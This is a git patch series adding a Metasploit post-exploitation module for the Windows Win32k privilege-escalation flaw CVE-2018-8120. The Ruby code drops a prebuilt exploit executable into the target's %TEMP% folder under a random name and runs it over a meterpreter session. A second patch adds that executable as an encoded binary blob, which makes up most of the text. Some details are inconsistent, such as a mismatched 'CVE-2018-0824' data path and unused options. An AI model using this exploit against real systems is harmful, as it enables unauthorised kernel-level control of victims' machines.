From 26ebd17954d20c0c8e2d9ba9a981217da168a4ef Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 12:37:57 +0530 Subject: [PATCH 01/39] WIP: CVE-2018-8120 --- .../escalate/ms18_8120_win32k_privsec.rb | 86 +++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 modules/post/windows/escalate/ms18_8120_win32k_privsec.rb diff --git a/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb new file mode 100644 index 0000000000..0ae4d589ad --- /dev/null +++ b/modules/post/windows/escalate/ms18_8120_win32k_privsec.rb @@ -0,0 +1,86 @@ +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + + include Msf::Post::File + include Msf::Post::Windows::Registry + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Win32k Elevation of Privilege Vulnerability', + 'Description' => %q{ + This module exploits elevation of privilege vulnerability exists in Windows when the Win32k + component fails to properly handle objects in memory. An attacker who successfully exploited + this vulnerability could run arbitrary code in kernel mode. An attacker could then install + programs; view, change, or delete data; or create new accounts with full user rights.}, + 'References' => + [ + ['CVE', '2018-8120'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'], + ['URL', 'https://github.com/unamer/CVE-2018-8120'] + ], + 'Author' => + [ + 'unamer', # Exploit PoC + 'Anton Cherepanov', # Vulnerability discovery + 'Dhiraj Mishra ' # Metasploit module + ], + 'DisclosureDate' => 'Aug 05 2018', + 'Arch' => [ARCH_X64], + 'SessionTypes' => ['meterpreter'], + 'License' => MSF_LICENSE + )) + + register_options( + [ + OptString.new('POCCMD', [true, 'The command to run from CVE-2018-8120.exe']), + OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ]) + ]) + end + + def write_exe_to_target(rexe, rexename) + begin + print_warning("writing to %TEMP%") + temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + write_file_to_target(temprexe,rexe) + end + print_good("Persistent Script written to #{temprexe}") + temprexe + end + + def write_file_to_target(temprexe,rexe) + fd = session.fs.file.new(temprexe, "wb") + fd.write(rexe) + fd.close + end + + def create_payload_from_file(exec) + print_status("Reading Payload from file #{exec}") + ::IO.read(exec) + end + + def run + rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe" + print_status("exe name is: #{rexename}") + poccmd = datastore['POCCMD'] + cmdcheck = datastore['CMDCHECK'] + + rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'CVE-2018-8120.exe') + raw = create_payload_from_file rexe + script_on_target = write_exe_to_target(raw, rexename) + + print_status('Starting module...') + print_line('') + + command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename + print_status("Location of CVE-2018-8120.exe is: #{command}") + + print_status("Executing command : #{command}") + command_output = cmd_exec(command) + print_line(command_output) + print_line('') + + end +end From 89b0ac6f874533b12429df6fc6ad3c2e79aff854 Mon Sep 17 00:00:00 2001 From: Dhiraj Mishra Date: Tue, 18 Sep 2018 14:59:43 +0530 Subject: [PATCH 02/39] Adding suport files --- data/exploits/CVE-2018-8120/CVE-2018-8120.exe | Bin 0 -> 95744 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 data/exploits/CVE-2018-8120/CVE-2018-8120.exe diff --git a/data/exploits/CVE-2018-8120/CVE-2018-8120.exe b/data/exploits/CVE-2018-8120/CVE-2018-8120.exe new file mode 100644 index 0000000000000000000000000000000000000000..036dd38a1307ee9a5505822a095c2bee484a57f0 GIT binary patch literal 95744 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%0ArEwM5#f#?;j`@|qwFLeNn(I_Jw7EZT2k~x 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 